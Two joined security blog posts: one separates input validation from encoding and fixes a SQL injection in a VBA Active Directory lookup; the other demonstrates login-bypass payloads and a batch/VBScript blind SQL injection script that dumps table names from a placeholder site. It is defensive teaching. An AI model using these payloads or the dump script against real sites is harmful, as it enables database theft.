Information Security is full of terminology.
Sometimes we even understand what we mean. Iâve yet to come across a truly awesome, yet brief, definition of âthreatâ, for instance.
But one that bugs me, because it shouldnât be that hard to get right, and because I hear it from people I otherwise respect greatly, is that of âinput validationâ.
Fight me on this, but I think that validation is essentially a yes/no decision on a set of input, whether itâs textual, binary, or whatever other format you care to define.
Exactly what you are validating is up for debate, whether youâre looking at syntax or semantics â is it formatted correctly, versus does it actually make sense?
âGreen ideas sleep furiouslyâ is a famous example of a sentence that is syntactically correct â it follows a standard âAdjective noun verb adverbâ pattern that is common in English â but semantically, it makes no sense: ideas canât be green, and they canât sleep, and nothing can sleep furiously (although my son used to sleep with his fists clenched really tight when he was a little baby).
â0 / 0â is a syntactically correct mathematical expression, but you can argue if itâs semantically correct.
âSell 1000 sharesâ might be a syntactically correct instruction, but semantically, it could be you donât have 1000 shares, or thereâs a business logic limit, which says such a transaction requires extra authentication.
So thereâs a difference between syntactical validation and semantic validation, butâŠ
Injection attacks occur when an input data â a string of characters â is semantically valid in the language of the enclosing code, as code itself, and not just as data. Sometimes (but not always) this means the data contains a character or character sequence that allows the data to âescapeâ from its data context to a code context.
This is a question I ask, in various round-about ways, in a lot of job interviews, so itâs quite an important question.
The answer is really simple.
Yes. And no.
If you can validate your input, such that it is always syntactically and semantically correct, you can absolutely prevent injection exploits.
But this is really only possible for relatively simple sets of inputs, and where the processing is safe for that set of inputs.
An example â suppose Iâve got a product ordering site, and Iâm selling books.
You can order an integer number of books. Strictly speaking, positive integers, and 0 makes no sense, so start at 1. You probably want to put a maximum limit on that field, perhaps restricting people to buying no more than a hundred of that book. If theyâre buying more, theyâll want to go wholesale anyway.
So, your validation is really simple â âis the field an integer, and is the integer value between 1 and 100?â
Having said âyes, and noâ, I have to show you an example of the ânoâ, right?
OK, letâs say youâre asking for validation of names of people â whatâs your validation rules?
Letâs assume youâre expecting everyone to have âlatinisedâ their name, to make it easy. All the letters are in the range a-z, or A-Z if thereâs a capital letter.
Great, so thereâs a rule â only match â[A-Za-z]â
Unless, you know, Leonardo da Vinci. Or di Caprio. So you need spaces.
Or Daniel Day-Lewis. So thereâs also hyphens to add.
And if you have an OâReilly, an OâBrian, or a DâArtagnan, or a NâDour â yes, youâre going to add apostrophes.
Now your validation rule is letting in a far broader range of characters than you start out with, and thereâs enough there to allow for SQL injection to happen.
Input can now be syntactically correct by your validation rule, and yet semantically equivalent to data plus SQL code.
I have a working hypothesis. It goes like this.
As a neophyte in information security, you learn a trick.
That trick is validation, and itâs a great thing to share with developers.
They donât need to be clever or worry hard about the input that comes in, they simply need to validate it.
It actually feels good to reject incorrect input, because you know youâre keeping the bad guys out, and the good guys in.
Then you find an input field where validation alone isnât sufficient.
But youâve told everyone â and had other security folk agree with you â that validation is the way to solve injection attacks.
So you learn a new trick â a new way of protecting inputs.
After all, it âŠ uhh, kind of does the same thing. It stops injection attacks, so it must be validation.
This new trick is encoding, quoting, or in some way transforming the data, so the newly transformed data is safe to accept.
Every one of those apostrophes? Turn them into the sequence â'â if theyâre going into HTML, or double them if theyâre in a SQL string, or â and this is FAR better â use parameterised queries so you donât have to even know how the input string is being encoded on its way into the SQL command.
Now your input can be validated â and injection attacks are stopped.
In fact, once youâve encoded your inputs properly, your validation can be entirely open and empty! At least from the security standpoint, because youâve made the string semantically entirely meaningless to the code in which it is to be embedded as data. There are no escape characters or sequences, because they, too, have been encoded or transformed into semantically safe data.
And I happen to think itâs important to separate the two concepts of validation and encoding.
Validation is saying âyesâ or ânoâ to the question âis this string âgoodâ data?â You can validate in a number of different ways, and with good defence in depth, youâll validate at different locations, based on different knowledge about what is âgoodâ. This matches very strongly with the primary dictionary definition of âvalidationâ â itâs awesome when a technical term matches very closely with a common language term, because teaching it to others becomes easier.
Encoding doesnât say âyesâ or ânoâ, encoding simply takes whatever input itâs given, and makes it safe for the next layer to which the data will be handed.
Every so often, I write about some real-world problems in this blog, rather than just getting excited about generalities. This is one of those times.
I had a list of users the other day, exported from a partner with whom we do SSO, and which somehow had some duplicate entries in.
These were not duplicate in the sense of âexactly the same data in every fieldâ, but differed by email address, and sometimes last name. Those of you who manage identity databases will know exactly what Iâm dealing with here â people change their last name, through marriage, divorce, adoption, gender reassignment, whim or other reason, and instead of editing the existing entry, a new entry is somehow populated to the list of identities.
What hadnât changed was that each of these individuals still held their old email address in Active Directory, so all I had to do was look up each email address, relate it to a particular user, and then pull out the canonical email address for that user. [In this case, thatâs the first email address returned from AD]
A quick search on the interwebs gave me this as a suggested VBA function to do just that:
1: Function GetEmail(email as String) as String
2: ' Given one of this users' email addresses, find the canonical one.
4: ' Find our default domain base to search from
5: Set objRootDSE = GetObject("LDAP://RootDSE")
6: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"
8: ' Open a connection to AD
9: Set ADOConnection = CreateObject("ADODB.Connection")
10: ADOConnection.Provider = "ADsDSOObject"
11: ADOConnection.Open "Active Directory Provider"
13: ' Create a command
14: Set ADCommand = CreateObject("ADODB.Command")
15: ADCommand.ActiveConnection = ADOConnection
17: 'Find user based on their email address
18: ADCommand.CommandText = _
19: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
20: strBase & " WHERE objectCategory='user' and mail='" & email & "'"
22: ' Execute this command
23: Set ADRecordSet = ADCommand.Execute
25: ' Extract the canonical email address for this user.
26: GetEmail = ADRecordSet.Fields("Mail")
28: ' Return.
29: End Function
That did the trick, and I stopped thinking about it. Printed out the source just to demonstrate to a couple of people that this is not rocket surgery.
Yesterday the printout caught my eye. Hereâs the particular line that made me stop:
18: ADCommand.CommandText = _
19: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
20: strBase & " WHERE objectCategory='user' AND mail='" & email & "'"
That looks like a SQL query, doesnât it?
Probably because it is.
Itâs one of two formats that can be used to query Active Directory, the other being the less-readable LDAP syntax.
Both formats have the same problem â when you build the query using string concatenation like this, itâs possible for the input to give you an injection by escaping from the data and into the code.
I checked this out â when I called this function as follows, I got the first email address in the list as a response:
1: Debug.Print GetEmail("x' OR mail='*")
You can see my previous SQL injection articles to come up with ideas of other things I can do now that Iâve got the ability to inject.
Normally, Iâd suggest developers use Parameterised Queries to solve this problem â and thatâs always the best idea, because it not only improves security, but it actually makes the query faster on subsequent runs, because itâs already optimised. Hereâs how that ought to look:
1: ADCommand.CommandText = _
2: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
3: strBase & "WHERE objectCategory='user' AND mail=?"
5: 'Create and bind parameter
6: Set ADParam = ADCommand.CreateParameter("", adVarChar, adParamInput, 40, email)
7: ADCommand.Parameters.Append ADParam
That way, the question mark â?â gets replaced with â’firstname.lastname@example.org’â (including the single quote marks) and my injection attempt gets quoted in magical ways (usually, doubling single-quotes, but the parameter insertion is capable of knowing in what way itâs being inserted, and how exactly to quote the data).
Thatâs the rather meaningful message:
Run-time error â-2147467262 (80004002)â:
No such interface supported
It doesnât actually tell me which interface is supported, so of course I spend a half hour trying to figure out what changed that might have gone wrong â whether Iâm using a question mark where perhaps I might need a named variable, possibly preceded by an â@â sign, but no, thatâs SQL stored procedures, which are almost never the SQL injection solution they claim to be, largely because the same idiot who uses concatenation in his web service also does the same stupid trick in his SQL stored procedures, but Iâm rambling now and getting far away from the point if I ever had one, soâŠ
The interface that isnât supported is the ability to set parameters.
The single best solution to SQL injection just plain isnât provided in the ADODB library and/or the ADsDSOObject provider.
Why on earth would you miss that out, Microsoft?
So, the smart answer here is input validation where possible, and if you absolutely have to accept any and all input, you must quote the strings that youâre passing in.
In my case, because Iâm dealing with email addresses, I think I can reasonably restrict my input to alphanumerics, the â@â sign, full stops, hyphens and underscores.
Input validation depends greatly on the type of your input. If itâs a string, that will need to be provided in your SQL request surrounded with single quotes â that means that any single quote in the string will need to be encoded safely. Usually that means doubling the quote mark, although you might choose to replace them with double quotes or back ticks.
If your input is a number, you can be more restrictive in your input validation â only those characters that are actually parts of a number. Thatâs not necessarily as easy as it sounds â the letter âeâ is often part of numbers, for instance, and you have to decide whether youâre going to accept bases other than 10. But from the perspective of securing against SQL injection, again thatâs not too difficult to enforce.
Finally, of course, you have to decide what to do when bad input comes in â an error response, a static value, throw an exception, ignore the input and refuse to respond, etc. If you choose to signal an error back to the user, be careful not to provide information an attacker could find useful.
Sometimes the mere presence of an error is useful.
Certainly if you feed back to the attacker the full detail of the SQL query that went wrong â and people do sometimes do this! â you give the attacker far too much information.
Even feeding back the incorrect input can be a bad thing in many cases. In the Excel case Iâm running into, thatâs probably not easily exploitable, but you probably should be cautious anyway â if itâs an attacker causing an error, they may want you to echo back their input to exploit something else.
Seriously, Microsoft, this is an unforgiveable lapse â not only is there no ability to provide the single best protection, because you didnât implement the parameter interface, but also your own samples provide examples of code that is vulnerable to SQL injections. [Here and here â the other examples I was able to find use hard-coded search filters.]
Microsoft, update your samples to demonstrate how to securely query AD through the ADODB library, and consider whether itâs possible to extend the provider with the parameter interface so that we can use the gold-standard protection.
Parse your parameters â make sure they conform to expected values. Complain to the user when they donât. Donât use lack of samples as a reason not to deliver secure components.
And, because I know a few of you will hope to copy directly from my code, hereâs how I wound up doing this exact function.
Please, by all means review it for mistakes â I donât guarantee that this is correct, just that itâs better than I found originally. For instance, one thing it doesnât check for is if the user actually has a value set for the âmailâ field in Active Directory â I can tell you for certain, itâll give a null reference error if you have one of these users come back from your search.
1: Function GetEmail(email As String) As String
2: ' Given one of this users' email addresses, find the canonical one.
4: ' Pre-execution input validation - email must contain only recognised characters.
5: If email Like "*[!a-zA-Z0-9_@.]*" Then
6: GetEmail = "Illegal characters"
7: Exit Function
8: End If
11: ' Find our default domain base to search from
12: Set objRootDSE = GetObject("LDAP://RootDSE")
13: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"
15: ' Open a connection to AD
16: Set ADOConnection = CreateObject("ADODB.Connection")
17: ADOConnection.Provider = "ADsDSOObject"
18: ADOConnection.Open "Active Directory Provider"
20: ' Create a command
21: Set ADCommand = CreateObject("ADODB.Command")
22: ADCommand.ActiveConnection = ADOConnection
24: 'Find user based on their email address
25: ADCommand.CommandText = _
26: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
27: strBase & " WHERE objectCategory='user' AND mail='" & email & "'"
29: ' Execute this command
30: Set ADrecordset = ADCommand.Execute
32: ' Post execution validation - we should have exactly one answer.
33: If ADrecordset Is Nothing Or (ADrecordset.EOF And ADrecordset.BOF) Then
34: GetEmail = "Not found"
35: Exit Function
36: End If
37: If ADrecordset.RecordCount > 1 Then
38: GetEmail = "Many matches"
39: Exit Function
40: End If
42: ' Extract the canonical email address for this user.
43: GetEmail = ADrecordset.Fields("Mail")
45: ' Return.
46: End Function
As always, let me know if you find this at all useful.
But then, Iâm hacking your website because of a 15-year-old flaw.
Itâs been noted for some time that I love playing with XSS, simply because itâs so widespread, and because itâs an indication of the likely security stance of the rest of the website.
But if XSS is important because itâs widely spread, itâs got a relatively low impact.
Slightly less widely spread, but often the cause of far greater damage, is SQL injection.
Iâll talk some more later about how SQL injection happens, but for now a quick demonstration of the power of SQL injection.
Every demonstration of SQL injection Iâve ever seen includes this example:
sqlCommandString = "SELECT userid FROM users WHERE userid='" + inputID + "' AND password='" + inputPass + "'"
And of course, the trick here is to supply the user ID â
adminâ and the password â
' OR 1='1â.
Sure, IF you have that code in your app, that will let the user in as admin.
But then, IF you have that code in your app, you have many bigger problems than SQL injection â because your user database contains unprotected passwords, and a leak will automatically tell the world how poor your security is, and always has been.
More likely, if you have SQL injection in the logon code at all, is that you will have code like this:
sqlCommandString = "SELECT userid, password FROM users WHERE userid='" + inputID + "'"
âŠ execute sqlCommandString âŠ
âŠ extract salt âŠ
âŠ hash incoming password âŠ
âŠ compare salted hash of incoming password against stored password âŠ
Again, if you were to have designed poorly, you might allow for multiple user records to come back (suppose, say, you allow the user to reuse old passwords, or old hashing algorithms), and you accept the first account with the right password. In that case, yes, an attacker could hack the login page with a common password, and the user ID â
' OR userid LIKE '%â â but then the attacker would have to know the field was called userid, and theyâre only going to get the first account in your database that has that password.
Doubtless there are many login pages which are vulnerable to SQL injection attacks like this, but they are relatively uncommon where developers have some experience or skill.
Where do you use a SQL-like database?
Anywhere thereâs a table of data to be queried, whether itâs a dictionary of words, or a list of popular kitchen repair technicians, etc, etc.
Imagine Iâve got a dictionary searching page, weblexicon.example (that doesnât exist, nor does weblexicon.com). Its main page offers me a field to provide a word, for which I want to see the definition.
If I give it a real word, it tells me the definition(s).
If I give it a non-existent word, it apologises for being unable to help me.
Seems like a database search is used here. Letâs see if itâs exploitable, by asking for âexample’â â thatâs âexampleâ with an extra single quote at the end.
Thatâs pretty cool â we can tell now that the server is passing our information off to a MySQL server. Those things that look like double-quotes around the word âexampleâ are in fact two single-quotes. A bit confusing, but it helps to understand whatâs going on here.
So, letâs feed the web lexicon a value that might exploit it. Sadly, it doesnât accept multiple commands, and gives the âYou have an error in your SQL syntaxâ message when I try it.
Worse still, for some reason I canât use the âUNIONâ or âJOINâ operators to get more data than Iâm allowed. This seems to be relatively common when there are extra parentheses, or other things we havenât quite guessed about the command.
That means weâre stuck with Blind SQL injection. With a blind SQL injection, or Blind SQLi, you can generally see whether a value is true or false, by the response you get back. Remember our comparison of a word that does exist and a word that doesnât? Letâs try that in a query to look up a true / false value:
So now, we can ask true / false questions against the database.
Seems rather limiting.
Letâs say weâre looking to see if the MySQL server is running a particular vulnerable version â we could ask for âexample’ and @@version=’18.104.22.168â â a true response would give us the hint that we can exploit that vulnerability.
But the SQL language has so many other options. We can say âdoes your version number begin with a â4ââ
A bit more exciting, but still pedestrian.
What if I want to find out what the currently executing statement looks like? I could ask âis it an âaâ? a âbâ? a âcâ?â and so on, but that is too slow.
Instead, I could ask for each bit of the characters, and thatâs certainly a good strategy â but the one I chose is to simply do a binary search, which is computationally equivalent.
A fifteen-year-old vulnerability (SQL injection is older than that, but I couldnât do the maths) deserves the same age of language to write my attack in.
So I chose batch file and VBScript (OK, theyâre both older than 15). Batch files canât actually download a web page, so thatâs the part I wrote in VBScript.
And the fun thing to dump would be all of the table names. That way, we can see what we have to play with.
So here you go, a simple batch script to do Blind Boolean SQL injection to list all the tables in the system.
echo wscript.echo chr(wscript.arguments(0)) > charout.vbs
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+like+'%stem%%%')+and+1='1 >%out%
@findstr /c:"1. [n" %out%> nul || (
if "!last!" lss "!last2!" (
set /a lasti=!lasti!+1
@set /a mid = (%lower% + %higher%) / 2
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+(ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+from+%nchars%+for+1))+between+%lower%+and+%mid%)+and+1='1 >%out%
@set /a nqueries=%nqueries%+1
@findstr /c:"1. [n" %out%> nul && (
set /a mid=%lower%-1
@set /a lower=%mid%+1
@if %lower% EQU 127 goto donecheck
@if %lower% NEQ %higher% goto check
@if %lower% EQU 32 @(set found= )
@for /f %%a in ('cscript charout.vbs //nologo %lower%') do @set found=%%a
@rem echo . | set /p foo=%found: =+%
@set /a nchars=%nchars%+1
@echo %lasti%: %stem%
@rem (%nqueries% queries)
@set /a lasti=!lasti!+1
And the output (demonstrating that there are still some concurrency issues to take care of):
Yes, thatâs all it takes.
If youâre a developer of a web app which uses a relational database back-end, take note â itâs exactly this easy to dump your database contents. A few changes to the batch file, and Iâm dumping column names and types, then individual items from tables.
And thatâs all assuming Iâm stuck with a blind SQL injection.
The weblexicon site lists table contents as its definitions, so in theory I should be able to use a UNION or a JOIN to add data from other tables into the definitions it displays. Itâs made easier by the fact that I can also access the command Iâm injecting into, by virtue of MySQL including that in a process table.
Note that if Iâm attacking a different site with a different injection point, I need to make two changes to my batch script, and Iâm away. Granted, this isnât exactly sqlmap.py, but then again, sqlmap.py doesnât always find or exploit all the vulns that you have available.
The takeaways today:
The code in this article is for demonstration purposes â Iâm not going to explain how it works, although it is very simple. The only point of including it is to show that a small amount of code can be the cause of a huge extraction of your siteâs data, but can be prevented by a small change.
Donât use this code to do bad things. Donât use other code to do bad things. Bad people are doing bad things with code like this (and better) already. Do good things with this code, and keep those bad people out.